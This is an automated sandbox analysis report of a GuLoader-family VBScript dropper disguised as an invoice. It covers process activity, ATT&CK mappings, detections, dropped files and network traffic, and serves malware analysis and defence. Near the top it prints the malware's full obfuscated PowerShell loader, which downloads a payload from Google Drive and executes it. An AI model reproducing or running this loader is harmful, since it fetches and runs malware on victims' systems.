Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kummelnweaving = 1;$Bredders130='Substrin';$Bredders130+='g';Function Fjter($Olericulturally){$Kummelnterdivisional=$Olericulturally.Length-$Kummelnweaving;For($Kummel=5; $Kummel -lt $Kummelnterdivisional; $Kummel+=(6)){$Endocoele67+=$Olericulturally.$Bredders130.Invoke($Kummel, $Kummelnweaving);}$Endocoele67;}function Jardiniere($Overparticularity){. ($Lflaskernes) ($Overparticularity);}$Heltalsdivisions=Fjter 'BetimMSourcoBa,rizS,ouxiBousol Ove.lDe sia M,du/Erh.e5Hrels.Impla0 Bal, .ran(.rstaWpaafuiSaltknIntond nddooNonrew UdbosExplo ProwlNPosteT Dig, ,mph1Comor0 Bes . Xyl 0Knokk;Fugac Ga.seWdeseriEksplnTeko 6eksem4 unap;Vil,f ,iscoxIndls6Skder4,corz;no,ar P.pnsrEtiopv Uopd: Ch,f1Str,g2 D.da1 Cre .Moron0Aksel)Baysv InkshGdermee CicecLa sekana ho Loin/ K,us2Zec i0Mortr1Vigep0 Para0Delta1 Misu0Boble1Puche Peri.FDevasiBogorrSk.dee Flodf I,vioTurboxce.tr/Teuto1 He t2 Ra,e1Vulga.K.nne0 P.ls ';$Maskinkoderne=Fjter 'Kry pUSvar s kanteBu.ikrAn ev-,ardiABehaggHemaneMolucnCerebtrekyl ';$Exencephalus=Fjter ' S.rihPourptHaemut,mugip Hepas Annu:quill/Cikad/Bonded Urobr edtsiFinagvSvovleHyper.,ugtsg MarkojumbuoTryghgUdledl To.ae .tat. 
UnnocOm.aloPhlegmDisjo/codicuAasencR,neb?KursceBoothx Abdop .ealoDotyerBi,iotQuadr= Jewed BrimoHydrowudplanDornel SaucoSolilaBombadOmmbl&TurnuiBalgedPolyp= Luf.1 r dso I osfBrnephPsyc p UnabnUhaanB BenePAkutiLSttteuinterv Syn,CMo.orfE.cashChicoTTtskrdFantaXFaareG ibriSGle.sUTypeazu,vidn SideL ightMDevovd SamdS SammpForgaVFri,iJ.doli1Afret3Kir.nulicit0 shir ';$typhloempyema=Fjter 'Udlev>.erti ';$Lflaskernes=Fjter 'AvlshiBortfeUn,rmx pio ';$Nonpainter = Fjter 'Truele TriecGuldhhBuccaoFo.si Begiv% ShadaBiddapRum.opV,sitd enataCharmtNepe aOvers% Udva\ MangmEna.eiMacuscUnsugrDal.oo Umisd CornaBellicT lsttAfrivyBop.elOverso TyrauAutofsHalst.CalceA ingsaNonprrCoevo Eppyd&Mi.da& S lv MaterebundfcB ligh PikioAften Pitto$ Joy. ';Jardiniere (Fjter 'Nippe$KnlesgSnus.lFodb,o,fskebPr,smaDet,mlAccro:N nexFA korjGippoe JuverAppe,dtilpleHystedHab,reFagall DyresRikocnSlaanokreoldPat,be.rederJivesn L goeIndfr=Fla,o(diarhcOrdremBodsvdGrav Opgan/skamrcOsten Del $G.senNcarraobent nFlyflpFodsvatelegiKr.dinCarrotEpicle As.erCoun,)Famil ');Jardiniere (Fjter 'Dekla$Rvestgtals lC onkoBirkebPassiaOverultopar: InteGFo.keawea.en Co,ogDesi.rBeklaeRecollUnpej=scolo$,arnfE JetsxKat aePec,sn dkslcB.rnieHa hop BranhFaar.aStetilOleoduModresMonod. Gru.sMe,kipSengel Silki FroctFolke( beha$ K astTousey hulepA.unchDittalStofloHjlp e Puszm SugepVemodySp,ereAghasmPlatyaRidgi)Dyste ');$Exencephalus=$Gangrel[0];Jardiniere (Fjter 'Unita$udlsngEtlarlAnd,noUnsa.bBr,mia RuinlRodte:Concio Ingevderuie Multrr.debpCocknlIn.bsu.adiomLingvpGener=InforNHome,eHandlwPsych- DaubO N.ckbF,ltpjDisabeDe.oncStatstEpig, Kenn S.rogry Ho,ss Udmnt Excle.uperm ,oor.SpaltN Tri.e ,krit Cuph.Bal.nWTao,ieIntoxbBeflaCSubcalTrizoiBalaneAfdranafbagt Bro, ');Jardiniere (Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\microdactylous.Aar && echo $"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Gather Victim Identity Information | 221 Scripting | Valid Accounts | 11 Command and Scripting Interpreter | 221 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label
--- | --- | --- | ---
FACTURA24021151 - BP.vbs | 24% | ReversingLabs | Script-WScript.Trojan.Guloader
FACTURA24021151 - BP.vbs | 16% | Virustotal |
No Antivirus matches
Source | Detection | Scanner | Label
--- | --- | --- | ---
http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | --- | ---
drive.google.com | 173.194.219.101 | true | false | | high
drive.usercontent.google.com | 142.251.15.132 | true | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
--- | --- | --- | --- | ---
https://www.google.com | powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.2175250694.000002B83A805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://drive.usercontent.google.com | powershell.exe, 00000002.00000002.2136160761.000002B82C43D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
https://drive.google.comP | powershell.exe, 00000002.00000002.2136160761.000002B82BF09000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000002.00000002.2136160761.000002B82B932000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2175250694.000002B83A805000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000002.00000002.2175250694.000002B83A6C3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://drive.google.com | powershell.exe, 00000002.00000002.2136160761.000002B82BF09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com | powershell.exe, 00000002.00000002.2136160761.000002B82AADB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://drive.google.com | powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000002.00000002.2136160761.000002B82A651000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://apis.google.com | powershell.exe, 00000002.00000002.2136160761.000002B82C498000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AB43000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82AABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2136160761.000002B82C42A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2136160761.000002B82A651000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000002.00000002.2136160761.000002B82A877000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
--- | --- | --- | --- | --- | ---
142.251.15.132 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
173.194.219.101 | drive.google.com | United States | 15169 | GOOGLEUS | false
                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1427938
                                Start date and time:2024-04-18 11:09:54 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 5m 6s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:7
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:FACTURA24021151 - BP.vbs
                                Detection:MAL
                                Classification:mal96.expl.evad.winVBS@6/6@2/2
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 5
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs
                                • Stop behavior analysis, all processes terminated
                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                • Excluded IPs from analysis (whitelisted): 23.40.205.34, 23.40.205.26, 23.40.205.18
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                • Execution Graph export aborted for target powershell.exe, PID 5960 because it is empty
                                • Not all processes were analyzed; the report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                Time | Type | Description
                                11:10:41 | API Interceptor | 1x Sleep call for process: wscript.exe modified
                                11:10:44 | API Interceptor | 42x Sleep call for process: powershell.exe modified
                                Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                3b5074b1b5d032e5620f69f9f700ff0e | Arrival Notice PUS_pdf.vbs | Get hash | malicious | AgentTesla, GuLoader | Browse
                                • 142.251.15.132
                                • 173.194.219.101
                                | Transferencias SEPA.vbs | Get hash | malicious | Unknown | Browse
                                • 142.251.15.132
                                • 173.194.219.101
                                | shipping doc.vbs | Get hash | malicious | GuLoader | Browse
                                • 142.251.15.132
                                • 173.194.219.101
                                | FACTURA 130424435.vbs | Get hash | malicious | Unknown | Browse
                                • 142.251.15.132
                                • 173.194.219.101
                                | justificant de transfer#U00e8ncia.vbs | Get hash | malicious | Unknown | Browse
                                • 142.251.15.132
                                • 173.194.219.101
                                | Justificante de pago.vbs | Get hash | malicious | Unknown | Browse
                                • 142.251.15.132
                                • 173.194.219.101
                                | Purchase Order PDF.exe | Get hash | malicious | AgentTesla | Browse
                                • 142.251.15.132
                                • 173.194.219.101
                                | Leoch-Purchase Order.exe | Get hash | malicious | AgentTesla | Browse
                                • 142.251.15.132
                                • 173.194.219.101
                                | p silp AI240190.pdf.exe | Get hash | malicious | AgentTesla | Browse
                                • 142.251.15.132
                                • 173.194.219.101
                                | SecuriteInfo.com.Variant.MSILHeracles.77820.8707.3938.exe | Get hash | malicious | Unknown | Browse
                                • 142.251.15.132
                                • 173.194.219.101
                                Process:C:\Windows\System32\wscript.exe
                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                Category:dropped
                                Size (bytes):69993
                                Entropy (8bit):7.99584879649948
                                Encrypted:true
                                SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                MD5:29F65BA8E88C063813CC50A4EA544E93
                                SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.
                                Process:C:\Windows\System32\wscript.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):330
                                Entropy (8bit):3.136616309291395
                                Encrypted:false
                                SSDEEP:6:kKRgVlDN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:IlMkPlE99SNxAhUeVLVt
                                MD5:8FAFF9F9746F36958EAD4066BB602640
                                SHA1:CE226C8863DF5040F178F4AAED37F642EDFC5B97
                                SHA-256:D2B04749EE694652B74B74253C0359F6CCBD736F265F9CDF803E4DEF9CC3F748
                                SHA-512:8CC44B53AC7C5F96509DF3BA597CC3906022F096D1950A3D816420FB1B62306452ABED5CFFF8112F14EF1EA99682106BC49FDECDE1251A6975C722744AEF82AD
                                Malicious:false
                                Reputation:low
                                Preview:p...... ...........Ip...(....................................................... ........M.........(...........i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:Nlllultnxj:NllU
                                MD5:F93358E626551B46E6ED5A0A9D29BD51
                                SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:@...e................................................@..........
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:HTML document, ASCII text, with very long lines (1692), with no line terminators
                                Category:dropped
                                Size (bytes):1692
                                Entropy (8bit):5.107673373238809
                                Encrypted:false
                                SSDEEP:24:hazspjXlvhXlhEG0qnXXX08Ucq9J8mZoWHMzj+cB7jTsoT9FyVZ81wmna:7pj1mRq+fjsueFYaWJ
                                MD5:1A94DD44A29CFAB54C27D1284DA87916
                                SHA1:D14B41A5D17FBB3F8B0D4080369F1C4B9C43E665
                                SHA-256:CFC291F5127EF8531C3518740515984DA37D19A80E81165971F406CC11A4D46A
                                SHA-512:C8FC7035D3B438A9DB2FE11B91580D54589FE5D9F1F5B2CC9FFA6BEF105F0136379D44A33B707F6705A8BE11FEE0B46764BC1EC73B3F30A8D2837D3BA98BFB2A
                                Malicious:false
                                Reputation:low
                                Preview:<!DOCTYPE html><html><head><title>Google Drive - Infected file</title><meta http-equiv="content-type" content="text/html; charset=utf-8"/><style nonce="QS7IZWgmLP4EspOrIh1CPw">.goog-link-button{position:relative;color:#15c;text-decoration:underline;cursor:pointer}.goog-link-button-disabled{color:#ccc;text-decoration:none;cursor:default}body{color:#222;font:normal 13px/1.4 arial,sans-serif;margin:0}.grecaptcha-badge{visibility:hidden}.uc-main{padding-top:50px;text-align:center}#uc-dl-icon{display:inline-block;margin-top:16px;padding-right:1em;vertical-align:top}#uc-text{display:inline-block;max-width:68ex;text-align:left}.uc-error-caption,.uc-warning-caption{color:#222;font-size:16px}#uc-download-link{text-decoration:none}.uc-name-size a{color:#15c;text-decoration:none}.uc-name-size a:visited{color:#61c;text-decoration:none}.uc-name-size a:active{color:#d14836;text-decoration:none}.uc-footer{color:#777;font-size:11px;padding-bottom:5ex;padding-top:5ex;text-align:center}.uc-footer a{colo
                                File type:ASCII text, with CRLF line terminators
                                Entropy (8bit):5.256313401799237
                                TrID:
                                • Visual Basic Script (13500/0) 100.00%
                                File name:FACTURA24021151 - BP.vbs
                                File size:215'851 bytes
                                MD5:c782d407c65fb588872ca0d46bf40d75
                                SHA1:3618270c1dadde1fd9b0b9c9a93148317f814628
                                SHA256:83d1ada429755f86e1468a30957b910641d112d83f44390bcfa38d5c9210d244
                                SHA512:f14591b45890bcff8438779319d039efb613e1743b15d75108cfafd9d5f15a76eaa4db8e29e975cd9e5b3a5a6b322b052fb6c45a581b60992d0a389e015a32fe
                                SSDEEP:6144:AYBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJf7Pqz:Z2dObjan
                                TLSH:352418F0CF0B36199F5B3EDAAC6445928AF44195011638B5AAD817EDB283D2CE3FDD18
                                File Content Preview:..'Lollup kystvagt? newscasters195: wirrah: premade..'fernbrake; overdominating dures forsgsordnings?..'Rashnesses; ulykkesfuglene depositive stimulansers72..'Makroerne bidery? typewrote..'Jagtbderne nonleprous..'Dateringsforsgets128, maries:.. ..'Tordenb
                                Icon Hash:68d69b8f86ab9a86
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Apr 18, 2024 11:10:46.080589056 CEST | 49706 | 443 | 192.168.2.5 | 173.194.219.101
                                Apr 18, 2024 11:10:46.080630064 CEST | 443 | 49706 | 173.194.219.101 | 192.168.2.5
                                Apr 18, 2024 11:10:46.080718040 CEST | 49706 | 443 | 192.168.2.5 | 173.194.219.101
                                Apr 18, 2024 11:10:46.090661049 CEST | 49706 | 443 | 192.168.2.5 | 173.194.219.101
                                Apr 18, 2024 11:10:46.090676069 CEST | 443 | 49706 | 173.194.219.101 | 192.168.2.5
                                Apr 18, 2024 11:10:46.309928894 CEST | 443 | 49706 | 173.194.219.101 | 192.168.2.5
                                Apr 18, 2024 11:10:46.310015917 CEST | 49706 | 443 | 192.168.2.5 | 173.194.219.101
                                Apr 18, 2024 11:10:46.310992956 CEST | 443 | 49706 | 173.194.219.101 | 192.168.2.5
                                Apr 18, 2024 11:10:46.311156988 CEST | 49706 | 443 | 192.168.2.5 | 173.194.219.101
                                Apr 18, 2024 11:10:46.315443039 CEST | 49706 | 443 | 192.168.2.5 | 173.194.219.101
                                Apr 18, 2024 11:10:46.315454006 CEST | 443 | 49706 | 173.194.219.101 | 192.168.2.5
                                Apr 18, 2024 11:10:46.315696001 CEST | 443 | 49706 | 173.194.219.101 | 192.168.2.5
                                Apr 18, 2024 11:10:46.326457024 CEST | 49706 | 443 | 192.168.2.5 | 173.194.219.101
                                Apr 18, 2024 11:10:46.372111082 CEST | 443 | 49706 | 173.194.219.101 | 192.168.2.5
                                Apr 18, 2024 11:10:46.538961887 CEST | 443 | 49706 | 173.194.219.101 | 192.168.2.5
                                Apr 18, 2024 11:10:46.539036036 CEST | 443 | 49706 | 173.194.219.101 | 192.168.2.5
                                Apr 18, 2024 11:10:46.539081097 CEST | 49706 | 443 | 192.168.2.5 | 173.194.219.101
                                Apr 18, 2024 11:10:46.541611910 CEST | 49706 | 443 | 192.168.2.5 | 173.194.219.101
                                Apr 18, 2024 11:10:46.649791956 CEST | 49707 | 443 | 192.168.2.5 | 142.251.15.132
                                Apr 18, 2024 11:10:46.649851084 CEST | 443 | 49707 | 142.251.15.132 | 192.168.2.5
                                Apr 18, 2024 11:10:46.649921894 CEST | 49707 | 443 | 192.168.2.5 | 142.251.15.132
                                Apr 18, 2024 11:10:46.650250912 CEST | 49707 | 443 | 192.168.2.5 | 142.251.15.132
                                Apr 18, 2024 11:10:46.650269985 CEST | 443 | 49707 | 142.251.15.132 | 192.168.2.5
                                Apr 18, 2024 11:10:46.874319077 CEST | 443 | 49707 | 142.251.15.132 | 192.168.2.5
                                Apr 18, 2024 11:10:46.874475956 CEST | 49707 | 443 | 192.168.2.5 | 142.251.15.132
                                Apr 18, 2024 11:10:46.877298117 CEST | 49707 | 443 | 192.168.2.5 | 142.251.15.132
                                Apr 18, 2024 11:10:46.877322912 CEST | 443 | 49707 | 142.251.15.132 | 192.168.2.5
                                Apr 18, 2024 11:10:46.877623081 CEST | 443 | 49707 | 142.251.15.132 | 192.168.2.5
                                Apr 18, 2024 11:10:46.878554106 CEST | 49707 | 443 | 192.168.2.5 | 142.251.15.132
                                Apr 18, 2024 11:10:46.924128056 CEST | 443 | 49707 | 142.251.15.132 | 192.168.2.5
                                Apr 18, 2024 11:10:47.320902109 CEST | 443 | 49707 | 142.251.15.132 | 192.168.2.5
                                Apr 18, 2024 11:10:47.320960045 CEST | 443 | 49707 | 142.251.15.132 | 192.168.2.5
                                Apr 18, 2024 11:10:47.321016073 CEST | 443 | 49707 | 142.251.15.132 | 192.168.2.5
                                Apr 18, 2024 11:10:47.321110010 CEST | 49707 | 443 | 192.168.2.5 | 142.251.15.132
                                Apr 18, 2024 11:10:47.322633982 CEST | 49707 | 443 | 192.168.2.5 | 142.251.15.132
                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Apr 18, 2024 11:10:45.970403910 CEST | 55641 | 53 | 192.168.2.5 | 1.1.1.1
                                Apr 18, 2024 11:10:46.074609041 CEST | 53 | 55641 | 1.1.1.1 | 192.168.2.5
                                Apr 18, 2024 11:10:46.543379068 CEST | 61906 | 53 | 192.168.2.5 | 1.1.1.1
                                Apr 18, 2024 11:10:46.648977041 CEST | 53 | 61906 | 1.1.1.1 | 192.168.2.5
                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                Apr 18, 2024 11:10:45.970403910 CEST | 192.168.2.5 | 1.1.1.1 | 0x124e | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
                                Apr 18, 2024 11:10:46.543379068 CEST | 192.168.2.5 | 1.1.1.1 | 0xe0d1 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                Apr 18, 2024 11:10:46.074609041 CEST | 1.1.1.1 | 192.168.2.5 | 0x124e | No error (0) | drive.google.com | | 173.194.219.101 | A (IP address) | IN (0x0001) | false
                                Apr 18, 2024 11:10:46.074609041 CEST | 1.1.1.1 | 192.168.2.5 | 0x124e | No error (0) | drive.google.com | | 173.194.219.138 | A (IP address) | IN (0x0001) | false
                                Apr 18, 2024 11:10:46.074609041 CEST | 1.1.1.1 | 192.168.2.5 | 0x124e | No error (0) | drive.google.com | | 173.194.219.139 | A (IP address) | IN (0x0001) | false
